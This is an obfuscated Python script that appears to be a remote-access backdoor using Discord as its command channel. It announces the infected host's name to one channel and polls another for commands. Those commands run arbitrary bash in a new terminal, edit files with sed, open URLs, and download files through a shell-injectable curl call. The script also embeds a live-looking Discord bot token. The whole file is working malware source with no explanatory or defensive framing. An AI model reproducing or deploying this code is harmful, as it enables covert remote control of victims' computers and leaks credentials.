import http.client as _A
import sys as _B
import json as _C
import time as _D
import socket as _E
import random as _F
import subprocess as _G

_H = 0
_I = "GM3l_P.mrkZgJvU5KWSoz1-onol2XfkW6YbmzlF8H1oT4"
_J = {"Content-Type": "application/json", 'Authorization': f'Bot MTIzMzQ4MTAxMDc4NDUwNTg1Nw.{_I}'}
_K = _E.gethostname().split('.')[0]

def _L(_M):
    _N = {"content": _M}
    _O = _C.dumps(_N)
    _P = _A.HTTPSConnection("discord.com")
    _Q = f"/api/v10/channels/1342067836415381565/messages"
    _P.request("POST", _Q, body=_O, headers=_J)
    _P.getresponse()
    _P.close()

def _R():
    print("Exiting...")
    _L(f"❌ `[{_K}] is deactivated`")
    _B.exit()

def _S():
    _G.run(['xrandr', '--output', 'eDP', '--rotate', 'inverted'], check=True)

def _T():
    _G.run(['xrandr', '--output', 'eDP', '--rotate', 'normal'], check=True)

def _U():
    _G.run(['xrandr', '--output', 'eDP', '--rotate', 'right'], check=True)

def _V():
    _G.run(['xrandr', '--output', 'eDP', '--rotate', 'left'], check=True)

def _W(_X):
    _G.Popen(['gnome-terminal', '--', 'bash', '-c', f'{_X}'])

def _Y(_Z):
    _a = _Z.split('?')
    _G.run(['sed', '-i', f'{_a[0]}', f'{_a[1]}'], check=True)

def _b(_c):
    _G.run(['firefox', '--new-tab', f'{_c}'], check=True)

def _d(_e):
    _G.run(f'curl "{_e}" -o img.jpg', shell=True, check=True)
    _G.run(['xdg-open', 'img.jpg'], check=True)

def _f(_g):
    match _g:
        case "exit":
            _R()
        case "activated":
            _L(f"✅ `{_K}-is activated`")
        case "inverted screen":
            _S()
        case "normal screen":
            _T()
        case "right screen":
            _U()
        case "left screen":
            _V()
        case _:
            return

def _h(_i):
    match _i[0]:
        case "newterm":
            _W(_i[1])
        case "sed":
            _Y(_i[1])
        case "firefox":
            _b(_i[1])
        case "openimg":
            _d(_i[1])
        case _:
            return

def _j():
    global _H
    while (True):
        try:
            _k = _A.HTTPSConnection("discord.com")
            _l = f"/api/v10/channels/1341791654503514122/messages?limit=1"
            _k.request("GET", _l, headers=_J)
            _m = _k.getresponse()
            _n = _m.read().decode("utf-8")
            _o = _C.loads(_n)

            _p = _o[0]['content']
            _q = _p.split('$')
            if len(_q) == 2:
                if _q[0] != _K:
                    _D.sleep(1)
                    continue
                if _H != _q[1]:
                    _H = _q[1]
                    _r = _H.split('!')
                    if len(_r) == 2:
                        _h(_r)
                    else:
                        _f(_H)
            elif len(_q) == 1:
                if _H != _q[0]:
                    _H = _q[0]
                    _s = _H.split('!')
                    if len(_s) == 2:
                        _h(_s)
                    else:
                        _f(_H)
            _D.sleep(_F.randint(1, 6))
        except Exception as _t:
            _L(f"❌ `[{_K}] Error: {_t}`")
            _D.sleep(_F.randint(5, 10))

if __name__ == "__main__":
    _L(f"✅ `[{_K}] is activated`")
    _j()
